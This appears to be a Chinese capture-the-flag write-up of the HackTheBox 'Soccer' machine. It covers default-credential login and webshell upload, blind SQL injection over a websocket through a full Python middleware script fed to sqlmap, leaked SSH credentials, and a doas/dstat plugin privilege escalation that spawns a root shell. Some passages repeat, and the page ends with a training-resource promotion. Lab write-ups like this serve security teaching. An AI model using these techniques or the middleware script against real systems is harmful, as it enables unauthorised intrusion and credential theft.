一、常规nmap扫描
发现该靶机开放了22和80端口,并且使用Nginx
二、80端口渗透
-
访问80端口,显示一个静态页面,并无其他信息
-
进行目录扫描
发现tiny目录,访问发现是个登录入口,经搜索发现这个入口默认密码为admin:admin@123
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Pj7o4itv-1691198340774)(https://image.3001.net/images/20230207/1675777053_63e2541d0ccbf3cd4df16.png!small)] -
登录后,发现其具有上传文件功能点,并具有任意文件上传漏洞,于是上传一个反弹shell的php马并成功反弹shell
-
返回的是一个非交互式shell,利用dpkg -l | grep python查看其具有python,并利用python生成一个交互式shell
-
通过/etc/passwd查询得知该机器有一个名为player的用户
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XpdgMVtK-1691198340778)(https://image.3001.net/images/20230207/1675777200_63e254b0f3df9ab2232a3.png!small)] -
由于之前扫描端口时发现这个网站使用Nginx,于是访问Nginx的配置文件
www-data@soccer:/etc/nginx$ cat nginx.conf
cat nginx.conf
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;events {
worker_connections 768;
# multi_accept on;
}http {
## # Basic Settings ## sendfile on; tcp_nopush on; tcp_nodelay on; keepalive_timeout 65; types_hash_max_size 2048; # server_tokens off; # server_names_hash_bucket_size 64; # server_name_in_redirect off; include /etc/nginx/mime.types; default_type application/octet-stream; ## # SSL Settings ## ssl_protocols TLSv1 TLSv1.1 TLSv1.2 TLSv1.3; # Dropping SSLv3, ref: POODLE ssl_prefer_server_ciphers on; ## # Logging Settings ## access_log /var/log/nginx/access.log; error_log /var/log/nginx/error.log; ## # Gzip Settings ## gzip on; # gzip_vary on; # gzip_proxied any; # gzip_comp_level 6; # gzip_buffers 16 8k; # gzip_http_version 1.1; # gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript; ## # Virtual Host Configs ## include /etc/nginx/conf.d/*.conf; include /etc/nginx/sites-enabled/*;
}
#mail {
# See sample authentication script at:
# http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript
# auth_http localhost/auth.php;
# pop3_capabilities “TOP” “USER”;
# imap_capabilities “IMAP4rev1” “UIDPLUS”;
server {
listen localhost:110;
protocol pop3;
proxy on;
}
server {
listen localhost:143;
protocol imap;
proxy on;
}
#}
-
继续访问默认站点配置文件,发现其还有另一个子域名为soc-player.soccer.htb
www-data@soccer:/etc/nginx/sites-enabled$ cat soc-player.htb
cat soc-player.htb
server {
listen 80;
listen [::]:80;server_name soc-player.soccer.htb; root /root/app/views; location / { proxy_pass http://localhost:3000; proxy_http_version 1.1; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection 'upgrade'; proxy_set_header Host $host; proxy_cache_bypass $http_upgrade; }
}
-
访问子域名soc-player.soccer.htb,发现其是具有注册登录功能的页面,于是自行注册账号并登录
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iBaYi8g7-1691198340779)(https://image.3001.net/images/20230207/1675777392_63e255705b9eca06de411.png!small)] -
登录进来发现只有一个验证ticket的界面,具有websocket接口,没其他信息
-
尝试sql注入,通过验证发现可以进行布尔盲注
-
布尔盲注纯手工注入太耗时间但是sqlmap无法直接对websocket接口进行自动化注入,通过google搜索找到一篇参考文章
https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-
automation.html
首先需要创建一个python脚本,代码如下:from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import unquote, urlparse
from websocket import create_connectionws_server = “ws://soc-player.soccer.htb:9091/”
def send_ws(payload):
ws = create_connection(ws_server)
# If the server returns a response on connect, use below line
#resp = ws.recv() # If server returns something like a token on connect you can find and extract from here# For our case, format the payload in JSON message = unquote(payload).replace('"','\'') # replacing " with ' to avoid breaking JSON structure data = '{"id":"%s"}' % message ws.send(data) resp = ws.recv() ws.close() if resp: return resp else: return ''
def middleware_server(host_port,content_type=“text/plain”):
class CustomHandler(SimpleHTTPRequestHandler): def do_GET(self) -> None: self.send_response(200) try: payload = urlparse(self.path).query.split('=',1)[1] except IndexError: payload = False if payload: content = send_ws(payload) else: content = 'No parameters specified!' self.send_header("Content-type", content_type) self.end_headers() self.wfile.write(content.encode()) return class _TCPServer(TCPServer): allow_reuse_address = True httpd = _TCPServer(host_port, CustomHandler) httpd.serve_forever()
print(“[+] Starting MiddleWare Server”)
print(“[+] Send payloads in http://localhost:8081/?id=*”)try:
middleware_server((‘0.0.0.0’,8081))
except KeyboardInterrupt:
pass
运行脚本并在另一个终端执行以下命令来进行sqlmap自动化注入
sqlmap -u http://localhost:8081?id=1 -p id --dbs
经过漫长的等待,获取到数据库用户名密码player:PlayerOftheMatch2022
- 利用得到的用户名密码进行ssh登录,获取到第一个flag
三、提权
-
常规进行sudo,suid等信息收集,经过一顿折腾发现doas这个组件能以写入插件的方式进行suid提权
-
首先在/usr/local/share/dstat/中写入一个一个dastat_开头的py文件,命名随意,内容为
import os
os.system(“bash -i”)
运行脚本后成功提权至root
- 随后在root文件夹下得到第二个rootflag
/usr/local/share/dstat/中写入一个一个dastat_开头的py文件,命名随意,内容为
import os
os.system("bash -i")
运行脚本后成功提权至root
[外链图片转存中…(img-hKS2ejJL-1691198340788)]
- 随后在root文件夹下得到第二个rootflag
[外链图片转存中…(img-CAvZ9E12-1691198340789)]
网络安全工程师(白帽子)企业级学习路线
第一阶段:安全基础(入门)
第二阶段:Web渗透(初级网安工程师)
第三阶段:进阶部分(中级网络安全工程师)
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
学习资源分享
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mlfAAHVU-1691198340793)(C:\Users\Administrator\Desktop\网络安全资料图\微信截图_20230201105953.png)]